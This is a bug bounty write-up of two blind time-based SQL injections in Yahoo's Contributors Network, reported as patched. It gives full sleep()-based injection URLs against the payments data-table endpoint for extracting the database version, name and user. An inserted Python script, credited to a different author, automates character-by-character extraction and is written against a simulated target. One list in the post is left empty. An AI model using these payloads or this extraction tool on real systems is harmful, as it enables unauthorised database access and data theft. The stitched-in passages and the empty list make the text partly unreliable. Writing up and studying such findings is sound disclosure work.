A Tale of 2 SQL Injections in Yahoo Contributors

Hello everyone. Today I will be covering a very short write-up regarding two of my latest findings while participating in the Yahoo Bug Bounty! First of all I want to apologize for not having any visuals (pictures/videos) for this write-up. Unfortunately, I lost a lot of data due to my malfunctioning laptop.

Blind & Time-Based SQL Injection in Yahoo Contributors Network:

"The Yahoo Contributors Network allows writers, photographers, and videographers to share their knowledge and passion (...) and earn money by pushing your unique perspectives..."

Judging by the description and by what the database looked like, it may well have carried sensitive and private personal information about the people participating in and getting paid for their work. While looking around the website, I came across two vulnerabilities in the following URLs/files:

http://contributor.yahoo.com/forum/search/?
http://contributor.yahoo.com/library/payments/data-table/?

In order to be able to exploit these URLs we are going to need:

Why? To be able to extract the needed data (such as the MySQL database name and username). Since nothing from the query is reflected in the page, every question has to be answered through the response time: the injected CASE sleeps for a short time when the guess is right and for a long time when it is wrong. First of all, let's figure out the database version:

contributor.yahoo.com/library/payments/data-table/?approved[]=1&approved[]=0&approved[]=0&approved[]=2&approved[]=2&approved[]=1&content_type[]=distribution&content_type[]=bonus&content_type[]=bonus&content_type[]=video&content_type[]=video&content_type[]=distribution&date_range=-e&end_date=e&override_id=131114?cat=2?cat=2?cat=4?cat=69&page=1&sort_column=(select+1+from+(select+CASE+WHEN+substring((select+version()),1,1)=4+THEN(sleep(1))+ELSE+(sleep(20))END+As+BS)v)&sort_dir=asc&start_date=&override_id=131114?cat=2?cat=2?cat=4?cat=69

The first character of version() is not 4, so the condition is false, the ELSE branch runs and the response is delayed by 20 seconds. Let's try version 5:

contributor.yahoo.com/library/payments/data-table/?approved[]=1&approved[]=0&approved[]=0&approved[]=2&approved[]=2&approved[]=1&content_type[]=distribution&content_type[]=bonus&content_type[]=bonus&content_type[]=video&content_type[]=video&content_type[]=distribution&date_range=-e&end_date=e&override_id=131114?cat=2?cat=2?cat=4?cat=69&page=1&sort_column=(select 1 from (select CASE WHEN substring((select version()),1,1)=5 THEN(sleep(1)) ELSE (sleep(20))END As BS)v)&sort_dir=asc&start_date=&override_id=131114?cat=2?cat=2?cat=4?cat=69

This time the data-table page comes back after roughly one second, so the version starts with 5. Now for the database name and the username. I will only demonstrate a few of the requests, because each one tests a single guess and the username was 24 characters long and the database name 6. Database name: ****ww

contributor.yahoo.com/library/payments/data-table/?approved[]=1&approved[]=0&approved[]=0&approved[]=2&approved[]=2&approved[]=1&content_type[]=distribution&content_type[]=bonus&content_type[]=bonus&content_type[]=video&content_type[]=video&content_type[]=distribution&date_range=-e&end_date=e&override_id=131114?cat=2?cat=2?cat=4?cat=69&page=1&sort_column=(select+1+from+(select+CASE+WHEN+(select+LENGTH(DATABASE()))=6+THEN(sleep(1))+ELSE+(sleep(20))END+As+BS)v)&sort_dir=asc&start_date=&override_id=131114?cat=2?cat=2?cat=4?cat=69

and for the username: ***********@**.***.*.*** (redacted for security purposes). As you can see in the URL below, the 15th character is confirmed to be a "." (ASCII 46); note that a wrong guess here sleeps for 60 seconds instead of 20:

http://contributor.yahoo.com/library/payments/data-table/?approved[]=1&approved[]=0&approved[]=0&approved[]=2&approved[]=2&approved[]=1&content_type[]=distribution&content_type[]=bonus&content_type[]=bonus&content_type[]=video&content_type[]=video&content_type[]=distribution&date_range=-e&end_date=e&override_id=131114?cat=2?cat=2?cat=4?cat=69&page=1&sort_column=(select 1 from (select CASE WHEN ASCII(substring((select user()),15,1))=46 THEN(sleep(1)) ELSE (sleep(60))END As BS)v)&sort_dir=asc&start_date=&override_id=131114
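The procedure above (a boolean condition wrapped in a sleep()-based CASE, one request per guess, with the response time as the only oracle) is tedious by hand but easy to automate. The following Python script is an added example, not code from the original post or from Yahoo: it builds the same sort_column payloads, recovers LENGTH() of a MySQL expression and then its characters one by one. The SimulatedTarget class, the SECRETS values and the 1 s / 20 s delays are constructed stand-ins so the script runs offline; against a real endpoint, request() would send the HTTP request and return the measured elapsed time instead.

```python
import re

TRUE_DELAY = 1    # seconds sleep() runs when the guess is right (post's convention)
FALSE_DELAY = 20  # seconds sleep() runs when the guess is wrong
THRESHOLD = (TRUE_DELAY + FALSE_DELAY) / 2  # slower than this => condition false


def sort_column_payload(condition, true_delay=TRUE_DELAY, false_delay=FALSE_DELAY):
    """Wrap a boolean SQL condition in the sleep()-based CASE from the post.
    The result is what goes into the injectable sort_column parameter."""
    return (f"(select 1 from (select CASE WHEN {condition} "
            f"THEN (sleep({true_delay})) ELSE (sleep({false_delay})) END As BS)v)")


def length_condition(expr, n):
    """(select LENGTH(DATABASE()))=6 in the post; expr is the bare MySQL call."""
    return f"(select LENGTH({expr}))={n}"


def char_condition(expr, position, value, op="="):
    """ASCII(substring((select user()),15,1))=46 in the post (1-based position)."""
    return f"ASCII(substring((select {expr}),{position},1)){op}{value}"


class SimulatedTarget:
    """Constructed stand-in for the vulnerable endpoint (not Yahoo's code).
    Recognises the two condition shapes built above, evaluates them against
    made-up secrets and returns the delay the real server would have shown.
    Nothing is sent anywhere and nothing actually sleeps."""
    _LEN = re.compile(r"\(select LENGTH\((.+?)\)\)=(\d+)")
    _CHR = re.compile(r"ASCII\(substring\(\(select (.+?)\),(\d+),1\)\)(>|<|=)(\d+)")

    def __init__(self, secrets):
        self.secrets = secrets
        self.requests = 0

    def request(self, sort_column):
        """Simulated response time in seconds for one injected request."""
        self.requests += 1
        m = self._CHR.search(sort_column)
        if m:
            expr, pos, op, val = m.group(1), int(m.group(2)), m.group(3), int(m.group(4))
            s = self.secrets[expr]
            # MySQL: substring() past the end gives '' and ASCII('') is 0
            code = ord(s[pos - 1]) if pos <= len(s) else 0
            result = {"=": code == val, ">": code > val, "<": code < val}[op]
        else:
            m = self._LEN.search(sort_column)
            if m is None:
                raise ValueError("unrecognised payload: " + sort_column)
            result = len(self.secrets[m.group(1)]) == int(m.group(2))
        return float(TRUE_DELAY if result else FALSE_DELAY)


def is_true(target, condition):
    """One request; a fast response means the WHEN branch (the guess) was right."""
    return target.request(sort_column_payload(condition)) < THRESHOLD


def extract_length(target, expr, max_len=64):
    """Linear scan of LENGTH(expr), as in the post's database-name request."""
    for n in range(1, max_len + 1):
        if is_true(target, length_condition(expr, n)):
            return n
    raise RuntimeError(f"LENGTH({expr}) exceeds {max_len}")


def extract_string(target, expr, length):
    """Recover expr one character at a time. Instead of one '=' request per
    candidate byte (up to 95 slow wrong guesses per position), binary-search
    the ASCII code with '>' comparisons: exactly 7 requests per character."""
    out = []
    for pos in range(1, length + 1):
        lo, hi = 0, 127  # the code is somewhere in [lo, hi]
        while lo < hi:
            mid = (lo + hi) // 2
            if is_true(target, char_condition(expr, pos, mid, ">")):
                lo = mid + 1
            else:
                hi = mid
        out.append(chr(lo))
    return "".join(out)


def dump(target, expr):
    """Full extraction for one MySQL expression: length first, then characters."""
    return extract_string(target, expr, extract_length(target, expr))


# Constructed secrets shaped like the post's (6-char db name, user@host); not real
SECRETS = {"DATABASE()": "ycnprd", "user()": "payments_ro@10.20.30.40"}

if __name__ == "__main__":
    t = SimulatedTarget(SECRETS)
    for expr in SECRETS:
        print(f"{expr:<11} -> {dump(t, expr)!r}")
    print(f"{t.requests} requests in total")
```

Two design points worth noting. The post's convention of a short sleep on a correct guess and a long one on a wrong guess means almost every request in a linear '=' scan is slow, which is why the binary search on '>' pays off: 7 requests per character regardless of the value, and each of them only costs the long delay about half the time. The threshold sits halfway between the two delays so that ordinary network jitter cannot flip a verdict; on a real target, repeat any request whose timing lands near the threshold before trusting it.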

After 36 days I finally heard back from Yahoo that it had been patched! Thank you for reading! In a few weeks I will be covering an XSPA and an XSS in a few services.

Behrouz Sadeghipour

@NahamSec
